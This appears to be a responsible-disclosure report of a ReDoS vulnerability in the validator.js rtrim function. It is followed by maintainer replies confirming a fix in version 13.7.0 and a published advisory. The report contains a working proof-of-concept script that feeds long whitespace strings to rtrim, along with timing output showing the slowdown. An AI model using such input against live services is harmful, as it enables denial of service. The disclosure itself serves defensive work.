Inefficient Regular Expression Complexity in validatorjs/validator.js
Reported on
Sep 21st 2021
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.
It allows cause a denial of service when calling function 'rtrim'.
The ReDoS vulnerability is mainly due to the regex /(\s)+$/g
and can be exploited with the following code.
Proof of Concept
// PoC.js
var validator = require("validator")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = 'a'+' '.repeat(i*10000)+"a";
validator.rtrim(attack_str);
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The Output
"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"
Reference
I have opened an issue before, but it is still not safe after fix.
For repair, you can refer to the rtrim
function in package trim
Occurrences
Thank you Yeting Li for reporting again a vulnerability in our package. Let me investigate the issue and get back to you asap
A PR containing a fix has been created. We will probably make a new release in the next few days including this fix. Thanks again Yeting Li for spotting the ReDoS!
Awesome!
Once the fix has been merged, feel free to confirm the fix on the report, and we can go ahead and publish a CVE 👏
Thank you guys! We finally released the fix in validator 13.7.0. We will probably add a security advisory when the CVE is published
Advisory published https://github.com/validatorjs/validator.js/security/advisories/GHSA-xx4c-jj58-r7x6 🎉